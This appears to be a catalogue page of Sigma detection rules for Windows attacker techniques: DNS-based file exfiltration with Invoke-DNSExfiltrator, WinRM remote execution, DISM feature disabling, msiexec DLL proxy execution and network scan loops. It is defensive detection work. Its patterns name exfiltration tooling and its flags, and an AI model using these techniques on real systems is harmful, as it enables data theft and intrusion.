Techniques
Sample rules
Powershell DNSExfiltration
- source: sigma
- technicques:
- t1048
Description
DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel
Detection logic
condition: selection_cmdlet
selection_cmdlet:
- ScriptBlockText|contains: Invoke-DNSExfiltrator
- ScriptBlockText|contains|all:
- ' -i '
- ' -d '
- ' -p '
- ' -doh '
- ' -t '
Enable Windows Remote Management
- source: sigma
- technicques:
- t1021
- t1021.006
Description
Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
Detection logic
condition: selection_cmdlet
selection_cmdlet:
ScriptBlockText|contains: 'Enable-PSRemoting '
Execute Invoke-command on Remote Host
- source: sigma
- technicques:
- t1021
- t1021.006
Description
Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
Detection logic
condition: selection_cmdlet
selection_cmdlet:
ScriptBlockText|contains|all:
- 'invoke-command '
- ' -ComputerName '
Dism Remove Online Package
- source: sigma
- technicques:
- t1562
- t1562.001
Description
Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
Detection logic
condition: 1 of selection_*
selection_dism:
CommandLine|contains|all:
- /Online
- /Disable-Feature
Image|endswith: \Dism.exe
selection_dismhost:
Image|endswith: \DismHost.exe
ParentCommandLine|contains|all:
- /Online
- /Disable-Feature
Suspicious Msiexec Execute Arbitrary DLL
- source: sigma
- technicques:
- t1218
- t1218.007
Description
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
Detection logic
condition: selection and not 1 of filter_*
filter_apple:
CommandLine|contains:
- \MsiExec.exe" /Y "C:\Program Files\Bonjour\mdnsNSP.dll
- \MsiExec.exe" /Y "C:\Program Files (x86)\Bonjour\mdnsNSP.dll
- \MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\ScriptingObjectModel.dll
- \MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\SoftwareUpdateAdmin.dll
- \MsiExec.exe" /Y "C:\Windows\CCM\
- \MsiExec.exe" /Y C:\Windows\CCM\
- \MsiExec.exe" -Y "C:\Program Files\Bonjour\mdnsNSP.dll
- \MsiExec.exe" -Y "C:\Program Files (x86)\Bonjour\mdnsNSP.dll
- \MsiExec.exe" -Y "C:\Program Files (x86)\Apple Software Update\ScriptingObjectModel.dll
- \MsiExec.exe" -Y "C:\Program Files (x86)\Apple Software Update\SoftwareUpdateAdmin.dll
- \MsiExec.exe" -Y "C:\Windows\CCM\
- \MsiExec.exe" -Y C:\Windows\CCM\
selection:
CommandLine|contains|windash: ' -y'
Image|endswith: \msiexec.exe
Suspicious Scan Loop Network
- source: sigma
- technicques:
- t1018
- t1059
Description
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system
Detection logic
condition: all of selection_*
selection_loop:
CommandLine|contains:
- 'for '
- 'foreach '
selection_tools:
CommandLine|contains:
- nslookup
- ping